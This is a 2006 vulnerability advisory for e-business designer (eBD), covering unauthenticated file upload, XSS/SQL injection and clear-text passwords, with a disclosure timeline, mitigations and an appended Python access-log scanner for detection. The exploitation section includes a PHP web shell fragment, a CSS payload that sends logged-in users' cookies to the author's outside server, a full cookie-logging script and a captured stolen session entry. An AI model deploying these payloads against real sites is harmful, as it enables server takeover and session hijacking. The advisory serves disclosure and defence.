Several flaws in e-business designer (eBD)



          ==============================                   - Advisory -
          ==============================
   Title:   Several flaws in e-business designer
    Risk:   Critical
    Date:   03.May.2006
  Author:   Pedro Andújar
     URL:   http://www.digitalsec.es
            http://www.514.es/


.: [ INTRO ] :.

  eBD is an Integrated Development Environment for the development and publication of web sites,
web applications and web services (Applications). In about 60% of the time typically required,
Designer expedites the creation of Applications based on an open architecture, accepted web
standards and without the need for in-depth knowledge about web technology.

  With eBD, you can develop any type of web application, web site or web service - intranet, 
extranet, eCommerce, eLearning portals, etc. You can deploy legacy applications on the web 
without re-coding the original application.

  eBusiness Designer has three distinct functional layers - Presentation, Data and Back Office. 
This structure permits a non-technical staff member to update any Application in real time, 
preview and publish it.


.: [ TECHNICAL DESCRIPTION ] :.

  During the development of some evaluation tasks against applications managed by the e-business
designer software, several bugs were discovered:


.: [ BUG #1 ]

Risk                : High
Description         : Ability to upload files to the system without authentication
Affected versions   : <= v3.1.4

  Access to a web edition tool without authentication allows remote users to upload files without
restriction. This vulnerability can be triggered by accessing the following URL:

http://ebdsite/common/html_editor/image_browser.upload.html 

  The file can be placed in different folders of the application; the upload location can usually
be found easily by exploring the web page source and locating the images folder. Another useful
tool for finding the file is:

http://edbsite/common/html_editor/image_browser.html 

  Additionally there is the html edition tool, whose parameters are:

  function abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links)
  {
	var argumentos = "form_name=" + form_name + "&name=" + name + "&source=" + source +
			"&ebd_links=" + links;

	if (idvista != null && idvista > 0)
		argumentos += "&usar_vista=" + idvista;

	if (atributo != null && atributo.length > 0)
		argumentos += "&usar_atributo=" + atributo;

	var href = "/common/html_editor/html_editor.html?"


  The result of this vulnerability is the ability to upload and/or modify files on the
system, which makes it possible to attack both the server and the web users.

These kinds of attacks succeeded against a server running version 2.3.3 of eBD:

Server side exploiting:
+ Code execution in the system using php/asp... shells: if the system has php installed,
command execution is possible through a web browser by uploading a file with the following content:


	----------------dsr.php-----------------
	&1");

	echo "
$out
";
	?>
	----------------dsr.php-----------------

Then, queries like "http://edbsite/path/to/dsr.php&cmd=uname -a ; id" can be executed.

Client side exploiting:
+ Cross Site Scripting (XSS), in applications with authentication methods: files uploaded
with "image_browser.upload.html" can overwrite application files, so it is possible to include
javascript code in a cascading style sheet (.css) that sends the cookie of every logged-in user
to our server through a GET request:

background: url('javascript:document.images[1].src="http://514.es/514.php?"+document.cookie;') repeat-x bottom;

We can place a script on our server to log the cookies we receive, although the access_log
already does this job:

XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] "GET /514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651 HTTP/1.1" 200 316 "http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Possible script:

	-----------------514.php------------------
	$srv) {
		file_put_contents($log, "$key=$srv\n", FILE_APPEND);
	}
	if (isset ($_GET) && count($_GET) > 0) {
		file_put_contents($log, "GET params\n", FILE_APPEND);
		foreach ($_GET as $key => $srv) {
			file_put_contents($log, "$key=$srv\n", FILE_APPEND);
		}
	}
	if (isset ($_POST) && count($_POST) > 0) {
		file_put_contents($log, "POST params\n", FILE_APPEND);
		foreach ($_POST as $key => $srv) {
			file_put_contents($log, "$key=$srv\n", FILE_APPEND);
		}
	}
	file_put_contents($log, "\n", FILE_APPEND);
	if ($img_type == "png") {
		Header("Content-type: image/png");
		ImagePNG(load_png("imgs/514.png"));
	}
	if ($img_type == "jpg") {
		Header("Content-type: image/jpeg");
		ImageJPEG(load_jpg("imgs/514.jpg"));
	}
	if ($img_type == "gif") {
		Header("Content-type: image/gif");
		ImageGIF(load_gif("imgs/514.gif"));
	}
	?>
	-----------------514.php------------------

  Additionally, it was verified that there is no maximum number of concurrent sessions per user.
This makes these kinds of attacks easier, because cookies obtained this way can be used at the
same time as the legitimate user's session.


.: [ BUG #2 ]

Risk                : High
Description         : Input validation error
Affected versions   : v2.3.3 without authentication
                      v3.1.4 requires admin access

  In some parameters parsed by eBD, the inclusion of special characters is not checked, so XSS
or code injection attacks are possible.

http://ebdsite/admin/form_grupo.html?id=

  This query will produce an "alert" message, and the server will respond with a SQL error
message that includes the path of the application:

ERROR en: SELECT * FROM Contenido C WHERE C.idContenido=' AND 1=1 AND ( idArea IS NULL OR idArea=3 ) -- You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND 1=1 AND ( idArea IS NULL OR idArea=3 )' at line 1 at /usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm line 179.
Stack:
[/usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm:179],
[/usr/eBD/ebd_modules/eBD/DB/DBDriver.pm:377],
[/usr/eBD/ebd_modules/eBD.pm:772],
[/usr/eBD/ebd_modules/eBD/Contenido.pm:453],
[/usr/eBD/htdocs/transhotel/archivos/dhandler:28],
[/usr/eBD/htdocs/ebdsite/archivos/autohandler:3]

  The same error occurs on version 2.3.3 of eBD with the following path requests:

	* http://ebdsite/archivos/'  or
	* http://ebdsite/files/'


.: [ BUG #3 ]

Risk                : Medium
Description         : Clear-text password during authentication
Affected versions   : <= v3.1.4

  In the authentication step, which by default goes over http instead of https, the username and
password fields are posted in plain text:

zona=inicial&username=DSR&password=514&entrar=Login


.: [ CHANGELOG ] :.

* 24/Apr/2006:
	- Several flaws discovered during the evaluation of the software installed at an
	  e-business designer customer.
* 25/Apr/2006:
	- Exploitation of the discovered flaws.
	- Asked for a security contact at eBD.
* 26/Apr/2006:
	- Rough draft of this document finished.
	- Advisory sent to .
	- Comments from eBD. Affected versions of each flaw clarified.
* 27/Apr/2006:
	- Some changes in this text.
* 02/May/2006:
	- Oasyssoft releases an emergency patch for the file upload bug.
	  (http://lists.oasyssoft.com/ebd-devel/200605/msg00000.html)
* 03/May/2006:
	- New comments and changes in the advisory.
* 10/May/2006:
	- Public disclosure.


.: [ SOLUTIONS ] :.

- Update to the latest available version (3.1.4).
- Emergency patch installation.
  (http://lists.oasyssoft.com/ebd-devel/200605/binNr7awTFdvt.bin)
  (Waiting for the final release in early June)
- Others:
	+ Disable directory listing in the web server.
	+ Force navigation through https.
	+ Disable php and/or asp support in the system if it is not required.
	+ Apply web application firewall solutions such as ModSecurity.
	+ Delete test accounts and check for strong passwords.


.: [ ACKNOWLEDGEMENTS ] :.

Thanks to A. Tarascó and J. Olascoaga for XSS help.
Thanks to Gandalfj for the translation.
Greetings to bRaCu and the people of !dSR, 514, haxorcitos and dlnd-0.


.: [ REFERENCES ] :.

[+] [eBD] e-business designer
    http://www.ebdsoft.com/
[+] Cross Site Scripting FAQ
    http://www.cgisecurity.com/articles/xss-faq.shtml
[+] NGS Advanced Sql Injection
    http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
[+] ModSecurity (Open source web application firewall)
    http://www.modsecurity.org/
[+] Guide to Building Secure Web Applications
    http://www.owasp.org/documentation/guide/guide_about.html
[+] !dSR - Digital Security Research
    http://www.digitalsec.net/
[+] 514 - 77
    http://www.514.es/
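Both the unauthenticated upload tool (bug #1) and the quote/script characters sent to the injectable paths (bug #2) leave traces in the eBD site's own web server access_log, so an administrator who cannot patch immediately can at least look for them. The following Python is an added example, not part of the advisory or of eBD itself: the log lines are constructed in the same Apache combined format as the entry quoted above, and every IP, timestamp and byte count in them is made up.

```python
import re
from urllib.parse import unquote, urlsplit

# One Apache "combined" access_log line, the same layout as the entry quoted in the advisory.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Bug #1: the HTML editor's upload page and file browser are reachable without authentication.
UPLOAD_PAGE = "/common/html_editor/image_browser.upload.html"
BROWSER_PAGE = "/common/html_editor/image_browser.html"
# Bug #2: these paths/parameters reach SQL and HTML without special characters being checked.
INJECTABLE_PREFIXES = ("/admin/form_grupo.html", "/archivos/", "/files/")
INJECTION_MARKERS = ("'", "<script")

def parse_line(line):
    """Return the fields of one access_log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return (severity, reason) for one parsed entry, or None when nothing matches."""
    parts = urlsplit(entry["target"])
    path, query = unquote(parts.path), unquote(parts.query)   # decode %27, %3C etc.
    if path == UPLOAD_PAGE:
        return ("high", "unauthenticated html_editor upload page (bug #1)")
    if path == BROWSER_PAGE:
        return ("medium", "html_editor file browser reached (bug #1)")
    if path.startswith(INJECTABLE_PREFIXES):
        haystack = (path + "?" + query).lower()
        if any(marker in haystack for marker in INJECTION_MARKERS):
            return ("high", "special characters in injectable path/parameter (bug #2)")
    return None

def scan_access_log(lines):
    """Return one (ip, timestamp, target, severity, reason) tuple per suspicious request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue          # not a combined-format line; skip rather than guess
        verdict = classify(entry)
        if verdict is not None:
            hits.append((entry["ip"], entry["ts"], entry["target"]) + verdict)
    return hits

# Constructed sample log (made-up IPs, timestamps and sizes) mixing normal and suspicious requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2006:11:01:02 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [25/Apr/2006:11:02:15 +0200] "POST /common/html_editor/image_browser.upload.html HTTP/1.1" 200 316 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [25/Apr/2006:11:03:40 +0200] "GET /admin/form_grupo.html?id=%27%3Cscript%3E HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [25/Apr/2006:11:04:22 +0200] "GET /archivos/%27 HTTP/1.1" 500 1203 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [25/Apr/2006:11:05:00 +0200] "GET /files/readme.txt HTTP/1.1" 200 44 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A hit on the upload page from a client that never authenticated is the strongest indicator; the bug #2 markers will also fire on legitimate file names containing an apostrophe, so treat them as leads to review rather than proof.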
